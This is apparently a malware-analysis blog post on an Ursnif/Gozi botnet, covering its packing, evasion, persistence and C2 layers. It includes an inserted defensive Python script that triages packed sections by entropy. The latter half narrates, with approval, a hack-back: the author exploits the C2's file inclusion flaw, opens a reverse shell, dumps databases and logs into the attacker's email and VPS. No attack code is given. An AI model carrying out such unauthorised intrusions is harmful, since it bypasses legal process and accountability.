Indeed Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload, so that many AV engines were not able to detect it, since the signature differed from that of the original payload. Finally, the de-packed payload presented many interesting features; for example it was weaponised with evasion techniques such as a timing delay (through sleep), a loop delay calling the GetSystemTimeAsFileTime API 9979141 times, BIOS version harvesting, system manufacturer information and system fingerprinting to check whether it was running in a virtual or physical environment. It installed itself in the Windows auto-run registry to gain persistence on the victim machine. The following action was performed while running with the background flag:
Stage3 finally connects back to the C2s once it has checked its own IP address. Two main C2s were observed:
C2 level_1 (for domains and IPs check the IoC section). Stage3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection's functionalities.
C2 level_2 (for domains and IPs check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to hand over stolen information. It's an Ursnif/Gozi and it exfiltrates user credentials by looking for specific files, grabbing the user clipboard and performing man-in-the-browser attacks against main web sites such as PayPal, Gmail, Microsoft and many online services.
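An added example, not the author's tooling: the entropy check behind the "high entropy on the added section" observation above, run over constructed PE-like sections (no real Stage2/Stage3 bytes). It flags sections that exceed a Shannon-entropy threshold or carry a known packer section name, which is how an analyst triages a sample for packing or an embedded encrypted payload before unpacking it.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())


def deterministic_noise(size: int, seed: bytes = b"constructed-sample") -> bytes:
    """Reproducible high-entropy bytes (chained SHA-256) standing in for an
    encrypted or compressed payload, so the example needs no real binary."""
    out = bytearray()
    block = seed
    while len(out) < size:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:size])


# Section names well-known packers leave behind. UPX is the packer the post
# mentions; the VMProtect names are an additional assumption of this example.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".vmp0", ".vmp1"}


def triage_sections(sections, entropy_threshold: float = 7.0):
    """Flag sections whose bytes look encrypted/compressed or whose name betrays a packer.

    sections: iterable of (name, raw_bytes) pairs, as a PE parser would give you.
    Returns a list of {"section", "entropy", "reasons"} dicts, one per flagged section.
    A threshold of 7.0 bits/byte is a common triage cut-off; plain code and data
    usually sit well below it, compressed or encrypted payloads close to 8.0.
    """
    findings = []
    for name, raw in sections:
        h = shannon_entropy(raw)
        reasons = []
        if h >= entropy_threshold:
            reasons.append("high entropy (likely compressed or encrypted payload)")
        if name in PACKER_SECTION_NAMES:
            reasons.append("known packer section name")
        if reasons:
            findings.append({"section": name, "entropy": round(h, 2), "reasons": reasons})
    return findings


# Constructed sample sections (not the real Stage2/Stage3 binary from this post).
SAMPLE_SECTIONS = [
    (".text", bytes(range(64)) * 64),        # moderate entropy (exactly 6.0 bits), stands in for code
    (".rdata", b"Hello, world\x00" * 200),   # low entropy: plain strings
    (".bin", deterministic_noise(4096)),     # unnamed high-entropy blob: the "added section" case
    ("UPX0", b"\x00" * 1024),                # zero-filled on disk, flagged by name only
    ("UPX1", deterministic_noise(2048)),     # packed code: flagged by name and by entropy
]


if __name__ == "__main__":
    for f in triage_sections(SAMPLE_SECTIONS):
        print(f"{f['section']:<8} entropy={f['entropy']:.2f}  {'; '.join(f['reasons'])}")
```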
So far so good. Everything looked like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, from my personal point of view, was "hand made" and pretty "young" as an implementation, in terms of HTML with no client-side controls, no clickjacking controls and no special login tokens. According to Yoroi's mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and collaborating with local authorities to shut them down, gathering as much information as possible in order to help federal and local police fight cyber crime.
Fortunately I spotted a file inclusion vulnerability in the Command and Control which let me in! The following image shows a reverse shell I spawned on the attacker's command and control.
Reverse Shell On C2 Stage_1
Now I was able to download the entire Command and Control source code (PHP) and study it! Studying this brand new C2 took me to the next level. First of all I was able to get access to the local database, where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image shows that the downloaded Command and Control source contains text in a Macedonian dialect (written in Cyrillic), which is consistent with the Anunak APT report published by Group-IB.
Command and Control Source Code (snip)
The following image is a simple screenshot of the database dump with the victim IPs (which are undisclosed for privacy reasons).
C2 level_1 Database
Additional investigation of the database brought up new connected IPs. Those IPs were querying MySQL with administrative rights, so at least two additional layers of C2 were present. While level_1 was weaponising the malware implant, level_2 was collecting information from victims. Studying the source code made it possible to find more 0-days to use against the C2 and to break into C2 level_2. Now I was able to see encrypted URLs coming from infected hosts. Important steps ahead are intentionally missing. Among many URLs I was able to identify a "test" connection from the attacker and focused on decrypting that one. Fortunately everything needed was written in the command and control source code. In this specific case the following function was fundamental to get to clear text!
URL Decryption Function
The eKey was stored directly in the DB and the decryption function was quite easy to reverse. Finally it was possible to work out how to decrypt the attacker's test string (the first transaction available in the logs) and voilà, it was possible to log in to the attacker's email :D !
Attacker eMail: VPS credentials
Once "in", a new need arose: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure it was possible to get access to the entire VPS control panel. At this point the general picture of the infrastructure* was clear, and so was how to block the threat, not only for customers but for everybody!
Attacker VPS Environment
Sharing these results for free would enable vendors (for example AV companies, firewall companies, IDS companies and so on) to update their signatures and block this threat for everybody around the world. I am sure that this work will not stop malicious actors, BUT at least we can raise our voice against cyber criminals!
In this post I described the main steps that took me to gain access to a big Ursnif/Gozi botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on the attacker infrastructure). The threat appeared very well structured: Docker containers were adopted to automate deployment of the malicious infrastructure and the code was quite well engineered. Many layers of command and control were found, and the entire infrastructure was probably set up by a criminal organisation rather than a single person.
The following graph shows the victim distribution for August 2018. The main targets currently are the USA with 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims in August 2018 number several thousand.
Victims Distribution on August 24 2018
During the analysis it was interesting to observe that the attacker was acquiring domains from an apparent "black market" where many actors were selling and buying apparently compromised domains (no evidence for this last point, only a feeling). The system (following picture) looks like a trading platform with a public API that third-party systems can operate, much like stock trading operators.
Apparent Domain BlackMarket
Hope you enjoyed the reading.
IoCs: the following is a list of interesting artefacts that would be helpful to block and prevent the described threat.